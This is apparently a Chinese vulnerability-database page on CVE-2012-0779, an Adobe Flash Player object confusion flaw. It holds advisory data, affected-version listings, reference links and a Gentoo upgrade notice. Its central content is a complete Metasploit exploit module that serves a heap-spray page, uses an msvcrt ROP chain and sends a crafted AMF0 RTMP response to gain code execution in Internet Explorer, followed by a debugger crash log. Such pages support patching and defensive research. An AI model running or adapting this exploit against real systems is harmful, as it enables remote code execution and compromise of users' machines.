CVE-2012-0779
CVSS9.3
发布时间 :2012-05-04 15:55:04
修订时间 :2018-01-17 21:29:07
NMCOEPS    

[原文]Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012.


[CNNVD]Adobe Flash Player任意代码执行漏洞(CNNVD-201205-107)

        Adobe Flash Player 是一款高性能的、轻量型且极具表现力的客户端运行时播放器。
        基于Windows,Mac OS X和Linux的Adobe Flash Player 10.3.183.19之前版本与11.2.202.235之前的11.x版本,基于Android 2.x与3.x版本的11.1.111.9之前版本和基于Android 4.x的11.1.115.8之前版本中存在漏洞。远程攻击者可利用该漏洞借助特制文件执行任意代码,该漏洞与“对象混淆漏洞” 相关。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:adobe:flash_player:6.0.21.0Adobe Flash Player 6.0.21.0
cpe:/a:adobe:flash_player:6.0.79Adobe Flash Player 6.0.79
cpe:/a:adobe:flash_player:7.0Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.0.1Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.0.14.0Adobe Flash MX 2004 7.0.14.0
cpe:/a:adobe:flash_player:7.0.19.0Adobe Flash MX 2004 7.0.19.0
cpe:/a:adobe:flash_player:7.0.24.0Adobe Flash MX 2004 7.0.24.0
cpe:/a:adobe:flash_player:7.0.25Adobe Flash Player 7.0.25
cpe:/a:adobe:flash_player:7.0.53.0Adobe Flash MX 2004 7.0.53.0
cpe:/a:adobe:flash_player:7.0.60.0Adobe Flash MX 2004 7.0.60.0
cpe:/a:adobe:flash_player:7.0.61.0Adobe Flash MX 2004 7.0.61.0
cpe:/a:adobe:flash_player:7.0.63Adobe Flash Player 7.0.63
cpe:/a:adobe:flash_player:7.0.66.0Adobe Flash MX 2004 7.0.66.0
cpe:/a:adobe:flash_player:7.0.67.0Adobe Flash MX 2004 7.0.67.0
cpe:/a:adobe:flash_player:7.0.68.0Adobe Flash MX 2004 7.0.68.0
cpe:/a:adobe:flash_player:7.0.69.0Adobe Flash Player 7.0.69.0
cpe:/a:adobe:flash_player:7.0.70.0Adobe Flash Player 7.0.70.0
cpe:/a:adobe:flash_player:7.0.73.0Adobe Flash MX 2004 7.0.73.0
cpe:/a:adobe:flash_player:7.1Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.1.1Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.2Adobe Flash MX 2004
cpe:/a:adobe:flash_player:8.0Adobe Flash Player 8.0
cpe:/a:adobe:flash_player:8.0.22.0Adobe Flash Player 8.0.22.0
cpe:/a:adobe:flash_player:8.0.24.0Adobe Flash 8.0.24.0
cpe:/a:adobe:flash_player:8.0.33.0Adobe Flash Player 8.0.33.0
cpe:/a:adobe:flash_player:8.0.34.0Adobe Flash Player 8.0.34.0
cpe:/a:adobe:flash_player:8.0.35.0Adobe Flash Player 8.0.35.0
cpe:/a:adobe:flash_player:8.0.39.0Adobe Flash Player 8.0.39.0
cpe:/a:adobe:flash_player:8.0.42.0Adobe Flash Player 8.0.42.0
cpe:/a:adobe:flash_player:9.0.8.0Adobe Flash Player 9.0.8.0
cpe:/a:adobe:flash_player:9.0.9.0Adobe Flash Player 9.0.289.0
cpe:/a:adobe:flash_player:9.0.16Adobe Flash Player 9.0.16
cpe:/a:adobe:flash_player:9.0.18d60Adobe Flash Player 9.0.18d60
cpe:/a:adobe:flash_player:9.0.20Adobe Flash Player 9.0.20
cpe:/a:adobe:flash_player:9.0.20.0Adobe Flash Player 9.0.20.0
cpe:/a:adobe:flash_player:9.0.28Adobe Flash Player 9.0.28
cpe:/a:adobe:flash_player:9.0.28.0Adobe Flash Player 9.0.28.0
cpe:/a:adobe:flash_player:9.0.31Adobe Flash Player 9.0.31
cpe:/a:adobe:flash_player:9.0.31.0Adobe Flash Player 9.0.31.0
cpe:/a:adobe:flash_player:9.0.45.0Adobe Flash Player 9.0.45.0
cpe:/a:adobe:flash_player:9.0.47.0Adobe Flash Player 9.0.47.0
cpe:/a:adobe:flash_player:9.0.48.0Adobe Flash Player 9.0.48.0
cpe:/a:adobe:flash_player:9.0.112.0Adobe Flash Player 9.0.112.0
cpe:/a:adobe:flash_player:9.0.114.0Adobe Flash Player 9.0.114.0
cpe:/a:adobe:flash_player:9.0.115.0Adobe Flash Player 9.0.115.0
cpe:/a:adobe:flash_player:9.0.124.0Adobe Flash Player 9.0.124.0
cpe:/a:adobe:flash_player:9.0.125.0Adobe Flash Player 9.0.125.0
cpe:/a:adobe:flash_player:9.0.151.0Adobe Flash Player 9.0.151.0
cpe:/a:adobe:flash_player:9.0.152.0Adobe Flash Player 9.0.152.0
cpe:/a:adobe:flash_player:9.0.155.0Adobe Flash 9.0.155.0
cpe:/a:adobe:flash_player:9.0.159.0Adobe Flash Player 9.0.159.0
cpe:/a:adobe:flash_player:9.0.246.0Adobe Flash Player 9.0.246.0
cpe:/a:adobe:flash_player:9.0.260.0Adobe Flash Player 9.0.260.0
cpe:/a:adobe:flash_player:9.0.262.0Adobe Flash Player 9.0.262.0
cpe:/a:adobe:flash_player:9.0.277.0Adobe Flash Player 9.0.277.0
cpe:/a:adobe:flash_player:9.0.280Adobe Flash Player 9.0.280
cpe:/a:adobe:flash_player:9.0.283.0Adobe Flash Player 9.0.283.0
cpe:/a:adobe:flash_player:9.125.0Adobe Flash Player 9.125.0
cpe:/a:adobe:flash_player:10.0.0.584Adobe Flash Player 10.0.0.584
cpe:/a:adobe:flash_player:10.0.2.54Adobe Flash Player 10.0.2.54
cpe:/a:adobe:flash_player:10.0.12.10Adobe Flash Player 10.0.12.10
cpe:/a:adobe:flash_player:10.0.12.36Adobe Flash Player 10.0.12.36
cpe:/a:adobe:flash_player:10.0.15.3Adobe Flash Player 10.0.15.3
cpe:/a:adobe:flash_player:10.0.22.87Adobe Flash Player 10.0.22.87
cpe:/a:adobe:flash_player:10.0.32.18Adobe Flash Player 10.0.32.18
cpe:/a:adobe:flash_player:10.0.42.34Adobe Flash Player 10.0.42.34
cpe:/a:adobe:flash_player:10.0.45.2Adobe Flash Player 10.0.45.2
cpe:/a:adobe:flash_player:10.1Adobe Flash Player 10.1
cpe:/a:adobe:flash_player:10.1.52.14Adobe Flash Player 10.1.52.14
cpe:/a:adobe:flash_player:10.1.52.14.1Adobe Flash Player 10.1.52.14.1
cpe:/a:adobe:flash_player:10.1.52.15Adobe Flash Player 10.1.52.15
cpe:/a:adobe:flash_player:10.1.53.64Adobe Flash Player 10.1.53.64
cpe:/a:adobe:flash_player:10.1.82.76Adobe Flash Player 10.1.82.76
cpe:/a:adobe:flash_player:10.1.85.3Adobe Flash Player 10.1.85.3
cpe:/a:adobe:flash_player:10.1.92.8Adobe Flash Player 10.1.92.8
cpe:/a:adobe:flash_player:10.1.92.10Adobe Flash Player 10.1.92.10
cpe:/a:adobe:flash_player:10.1.95.1Adobe Flash Player 10.1.95.1
cpe:/a:adobe:flash_player:10.1.95.2Adobe Flash Player 10.1.95.2
cpe:/a:adobe:flash_player:10.1.102.64Adobe Flash Player 10.1.102.64
cpe:/a:adobe:flash_player:10.1.105.6Adobe Flash Player 10.1.105.6
cpe:/a:adobe:flash_player:10.1.106.16Adobe Flash Player 10.1.106.16
cpe:/a:adobe:flash_player:10.2.152Adobe Flash Player 10.2.152
cpe:/a:adobe:flash_player:10.2.152.26Adobe Flash Player 10.2.152.26
cpe:/a:adobe:flash_player:10.2.152.32Adobe Flash Player 10.2.152.32
cpe:/a:adobe:flash_player:10.2.152.33Adobe Flash Player 10.2.152.33
cpe:/a:adobe:flash_player:10.2.153.1Adobe Flash Player 10.2.153.1
cpe:/a:adobe:flash_player:10.2.154.13Adobe Flash Player 10.2.154.13
cpe:/a:adobe:flash_player:10.2.154.25Adobe Flash Player 10.2.154.25
cpe:/a:adobe:flash_player:10.2.156.12Adobe Flash Player 10.2.156.12
cpe:/a:adobe:flash_player:10.2.157.51Adobe Flash Player 10.2.157.51
cpe:/a:adobe:flash_player:10.2.159.1Adobe Flash Player 10.2.159.1
cpe:/a:adobe:flash_player:10.3.181.14Adobe Flash Player 10.3.181.14
cpe:/a:adobe:flash_player:10.3.181.16Adobe Flash Player 10.3.181.16
cpe:/a:adobe:flash_player:10.3.181.22Adobe Flash Player 10.3.181.22
cpe:/a:adobe:flash_player:10.3.181.23Adobe Flash Player 10.3.181.23
cpe:/a:adobe:flash_player:10.3.181.26Adobe Flash Player 10.3.181.26
cpe:/a:adobe:flash_player:10.3.181.34Adobe Flash Player 10.3.181.34
cpe:/a:adobe:flash_player:10.3.183.5Adobe Flash Player 10.3.183.5
cpe:/a:adobe:flash_player:10.3.183.7Adobe Flash Player 10.3.183.7
cpe:/a:adobe:flash_player:10.3.183.10Adobe Flash Player 10.3.183.10
cpe:/a:adobe:flash_player:10.3.183.11Adobe Flash Player 10.3.183.11
cpe:/a:adobe:flash_player:10.3.183.15Adobe Flash Player 10.3.183.15
cpe:/a:adobe:flash_player:10.3.183.16Adobe Flash Player 10.3.183.16
cpe:/a:adobe:flash_player:10.3.183.18Adobe Flash Player 10.3.183.18
cpe:/a:adobe:flash_player:10.3.185.22Adobe Flash Player 10.3.185.22
cpe:/a:adobe:flash_player:11.0Adobe Flash Player 11.0
cpe:/a:adobe:flash_player:11.0.1.152Adobe Flash Player 11.0.1.152
cpe:/a:adobe:flash_player:11.0.1.152::~~~~x64~
cpe:/a:adobe:flash_player:11.0.1.153Adobe Flash Player 11.0.1.153
cpe:/a:adobe:flash_player:11.1Adobe Flash Player 11.1
cpe:/a:adobe:flash_player:11.1.102.55Adobe Flash Player 11.1.102.55
cpe:/a:adobe:flash_player:11.1.102.55::~~~~x64~
cpe:/a:adobe:flash_player:11.1.102.62Adobe Flash Player 11.1.102.62
cpe:/a:adobe:flash_player:11.1.102.63Adobe Flash Player 11.1.102.63
cpe:/a:adobe:flash_player:11.1.111.8Adobe Flash Player 11.1.111.8
cpe:/a:adobe:flash_player:11.1.115.7Adobe Flash Player 11.1.115.7
cpe:/a:adobe:flash_player:11.2.202.228Adobe Flash Player 11.2.202.228
cpe:/a:adobe:flash_player:11.2.202.233Adobe Flash Player 11.2.202.233

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:20472Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows allows remote attackers to execute arbitrary code via a crafte...
oval:org.mitre.oval:def:21162RHSA-2012:0688: flash-plugin security update (Critical)
oval:org.mitre.oval:def:23705ELSA-2012:0688: flash-plugin security update (Critical)
oval:org.mitre.oval:def:25131ELSA-2012:0688: flash-plugin security update (Critical)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0779
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-201205-107
(官方数据源) CNNVD

- 其它链接及资源

http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00004.html
(UNKNOWN)  SUSE  SUSE-SU-2012:0592
http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00005.html
(UNKNOWN)  SUSE  openSUSE-SU-2012:0594
http://rhn.redhat.com/errata/RHSA-2012-0688.html
(UNKNOWN)  REDHAT  RHSA-2012:0688
http://www.adobe.com/support/security/bulletins/apsb12-09.html
(VENDOR_ADVISORY)  CONFIRM  http://www.adobe.com/support/security/bulletins/apsb12-09.html
http://www.securityfocus.com/bid/53395
(UNKNOWN)  BID  53395
http://www.securitytracker.com/id?1027023
(UNKNOWN)  SECTRACK  1027023
https://exchange.xforce.ibmcloud.com/vulnerabilities/75383
(UNKNOWN)  XF  adobe-flash-objecttype-code-exec(75383)

- 漏洞信息

Adobe Flash Player任意代码执行漏洞
高危 资料不足
2012-05-07 00:00:00 2013-03-27 00:00:00
远程  
        Adobe Flash Player 是一款高性能的、轻量型且极具表现力的客户端运行时播放器。
        基于Windows,Mac OS X和Linux的Adobe Flash Player 10.3.183.19之前版本与11.2.202.235之前的11.x版本,基于Android 2.x与3.x版本的11.1.111.9之前版本和基于Android 4.x的11.1.115.8之前版本中存在漏洞。远程攻击者可利用该漏洞借助特制文件执行任意代码,该漏洞与“对象混淆漏洞” 相关。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.adobe.com/support/security/bulletins/apsb12-09.html

- 漏洞信息 (19369)

Adobe Flash Player Object Type Confusion (EDBID:19369)
windows remote
2012-06-25 Verified
0 metasploit
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:method     => "GetVariable",
		:classid    => "ShockwaveFlash.ShockwaveFlash",
		:rank       => NormalRanking, # reliable memory corruption
		:javascript => true
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Adobe Flash Player Object Type Confusion",
			'Description'    => %q{
				This module exploits a vulnerability found in Adobe Flash
				Player.  By supplying a corrupt AMF0 "_error" response, it
				is possible to gain arbitrary remote code execution under
				the context of the user.

				This vulnerability has been exploited in the wild as part of
				the "World Uyghur Congress Invitation.doc" e-mail attack.
				According to the advisory, 10.3.183.19 and 11.x before
				11.2.202.235 are affected.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'sinn3r', # Metasploit module
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-0779' ],
					[ 'OSVDB', '81656'],
					[ 'BID', '53395' ],
					[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info
					[ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]
				],
			'Payload'        =>
				{
					#'Space'    => 1024,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Flash Player 11.2.202.228
					[ 'Automatic', {} ],
					[
						'IE 6 on Windows XP SP3',
						{
							'Rop'    => nil,
							'RandomHeap' => false,
							'Offset' => '0x0'
						}
					],
					[
						'IE 7 on Windows XP SP3',
						{
							'Rop'    => nil,
							'RandomHeap' => false,
							'Offset' => '0x0'
						}
					],
					[
						'IE 8 on Windows XP SP3 with msvcrt ROP',
						{
							'Rop' => :msvcrt,
							'RandomHeap' => false,
							'Offset' => '238',
							'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 04 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
				OptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
				OptPort.new('RTMPPORT',    [ true, "The local port to RTMP service listen on.", 1935 ]),
			], self.class
		)

	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[3]  #IE 8 on Windows XP SP3
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V").first
	end

	def nop
		return make_nops(4).unpack("V").first
	end

	def ret(t)
		return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
	end

	def popret(t)
		return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
	end

	def get_rop_chain(t)

		# ROP chains generated by mona.py - See corelan.be
		print_status("Using msvcrt ROP")
		rop =
			[
				0x77c4e392,  # POP EAX # RETN
				0x77c11120,  # <- *&VirtualProtect()
				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
				junk,
				0x77c2dd6c,
				0x77c4ec00,  # POP EBP # RETN
				0x77c35459,  # ptr to 'push esp #  ret'
				0x77c47705,  # POP EBX # RETN
				0x00001000,  # EBX
				0x77c3ea01,  # POP ECX # RETN
				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
				0x77c46100,  # POP EDI # RETN
				0x77c46101,  # ROP NOP (-> edi)
				0x77c4d680,  # POP EDX # RETN
				0x00000040,  # newProtect (0x40) (-> edx)
				0x77c4e392,  # POP EAX # RETN
				nop,         # NOPS (-> eax)
				0x77c12df9,  # PUSHAD # RETN
			].pack("V*")

		code = ret(t)
		code << rand_text(119)
		code << rop
		code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
		code << payload.encoded
		offset = 2616 - code.length
		code << rand_text(offset)
		code << [ t['StackPivot'] ].pack("V")
		return code
	end

	def get_easy_spray(t, js_code, js_nops)

		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);


		heap_obj.gc();
		for (var z=1; z < 0x185; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end


	def get_aligned_spray(t, js_rop, js_nops)

		spray = <<-JS

		var heap_obj = new heapLib.ie(0x20000);
		var nops = unescape("#{js_nops}");
		var rop_chain = unescape("#{js_rop}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);


		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);


		heap_obj.gc();
		for (var z=1; z < 0x1c5; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end

	def exploit
		@swf = create_swf

		# Boilerplate required to handled pivoted listeners
		comm = datastore['ListenerComm']
		if comm == "local"
			comm = ::Rex::Socket::Comm::Local
		else
			comm = nil
		end

		@rtmp_listener = Rex::Socket::TcpServer.create(
			'LocalHost' => datastore['RTMPHOST'],
			'LocalPort' => datastore['RTMPPORT'],
			'Comm'      => comm,
			'Context'   => {
				'Msf'        => framework,
				'MsfExploit' => self,
			}	
		)
				
		# Register callbacks
		@rtmp_listener.on_client_connect_proc = Proc.new { |cli|
			add_socket(cli)
			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")
			on_rtmp_connect(cli)
		}

		@rtmp_listener.start

		super
	end

	def my_read(cli,size,timeout=nil)
		if timeout.nil?
			timeout = cli.def_read_timeout
		end

		buf = ""
		::Timeout::timeout(timeout) {
			while buf.length < size
			buf << cli.get_once(size - buf.length)
			end
		}
		buf
	end

	def do_handshake(cli)
		c0 = my_read(cli, 1)
		c1 = my_read(cli, 1536) # HandshakeSize => 1536
		s0 = "\3" # s0
		s1 = Rex::Text.rand_text(4) # s1.time
		s1 << "\x00\x00\x00\x00" # s1.zero
		s1 << Rex::Text.rand_text(1528) # s1.random_data
		s2 = c1 # s2
		cli.put(s0)
		cli.put(s1)
		cli.put(s2)
		c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)
	end

	def on_rtmp_connect(cli)

		begin
			do_handshake(cli)
			request = my_read(cli, 341) # connect request length

			case request
			when /connect/
				rtmp_header = "\x03" # Chunk Stream ID
				rtmp_header << "\x00\x00\x00" # Timestamp
				rtmp_header << "\x00\x00\x71" # Body Size
				rtmp_header << "\x14" # AMF0 Command
				rtmp_header << "\x00\x00\x00\x00" # Stream ID

				# String
				rtmp_body = "\x02" # String
				rtmp_body << "\x00\x06" # String length
				rtmp_body << "\x5f\x65\x72\x72\x6f\x72" # String: _error
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << "\x40\x00\x00\x00\x00\x00\x00\x00" # Number
				# Array
				rtmp_body << "\x0a" # AMF Type: Array
				rtmp_body << "\x00\x00\x00\x05" # Array length: 5
				# Array elements
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Crafter Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x0c\x0c\x0c\x0c" # Modify the "\x0c\x0c\x0c\x0c" to do an arbitrary call
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") +  "\x00\x00\x00\x00" # Number

				trigger = rtmp_header
				trigger << rtmp_body

				cli.put(trigger)
				@rtmp_listener.close_client(cli)
			end
		rescue
		ensure
			@rtmp_listener.close_client(cli)
			remove_socket(cli)
		end

	end

	def cleanup
		super
		return if not @rtmp_listener
		
		begin
			@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)
			if @rtmp_listener.kind_of?(Rex::Socket)
				@rtmp_listener.close
				@rtmp_listener.stop
			end
			@rtmp_listener = nil
		rescue ::Exception
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		print_status("Client requesting: #{request.uri}")

		if request.uri =~ /\.swf$/
			print_status("Sending Exploit SWF")
			send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
			return
		end

		p = payload.encoded
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

		if not my_target['Rop'].nil?
			js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
			js = get_aligned_spray(my_target, js_rop, js_nops)
		else
			js = get_easy_spray(my_target, js_code, js_nops)
		end

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
		swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

		if datastore['RTMPHOST'] == '0.0.0.0'
			rtmp_host = Rex::Socket.source_address('1.2.3.4')
		else
			rtmp_host = datastore['RTMPHOST']
		end

		rtmp_port = datastore['RTMPPORT']

		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<center>
		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
		id="test" width="1" height="1"
		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
		<param name="movie" value="#{swf_uri}" />
		<param name="FlashVars" value="var1=#{rtmp_host}&var2=#{rtmp_port}"
		<embed src="#{swf_uri}" quality="high"
		width="1" height="1" name="test" align="middle"
		allowNetworking="all"
		type="application/x-shockwave-flash"
		pluginspage="http://www.macromedia.com/go/getflashplayer"
		FlashVars="var1=#{rtmp_host}&var2=#{rtmp_port}">
		</embed>

		</object>
		</center>

		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def create_swf
		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )
		fd = ::File.open( path, "rb" )
		swf = fd.read(fd.stat.size)
		fd.close

		return swf
	end

end

=begin

* Flash Player 11.2.202.228

(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000
eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
ds:0023:44444470=????????

0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
104b1b30 53              push    ebx
104b1b31 ffd0            call    eax

=end
		

- 漏洞信息 (F114134)

Gentoo Linux Security Advisory 201206-21 (PacketStormID:F114134)
2012-06-24 00:00:00
Gentoo  security.gentoo.org
advisory,denial of service,arbitrary,vulnerability
linux,gentoo
CVE-2012-0779,CVE-2012-2034,CVE-2012-2035,CVE-2012-2036,CVE-2012-2037,CVE-2012-2038,CVE-2012-2039,CVE-2012-2040
[点击下载]

Gentoo Linux Security Advisory 201206-21 - Multiple vulnerabilities have been found in Adobe Flash Player could result in the execution of arbitrary code or Denial of Service. Versions less than 11.2.202.236 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201206-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal
    Title: Adobe Flash Player: Multiple vulnerabilities
     Date: June 23, 2012
     Bugs: #414603, #420311
       ID: 201206-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Adobe Flash Player could
result in the execution of arbitrary code or Denial of Service.

Background
==========

The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  www-plugins/adobe-flash   < 11.2.202.236         >= 11.2.202.236

Description
===========

Multiple vulnerabilities have been discovered in Adobe Flash Player.
Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could entice a user to open a specially crafted SWF
file, possibly resulting in execution of arbitrary code with the
privileges of the process or a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Flash Player users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.236"

References
==========

[ 1 ] CVE-2012-0779
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0779
[ 2 ] CVE-2012-2034
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2034
[ 3 ] CVE-2012-2035
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2035
[ 4 ] CVE-2012-2036
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2036
[ 5 ] CVE-2012-2037
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2037
[ 6 ] CVE-2012-2038
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2038
[ 7 ] CVE-2012-2039
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2039
[ 8 ] CVE-2012-2040
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2040

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-201206-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
    

- 漏洞信息 (F114107)
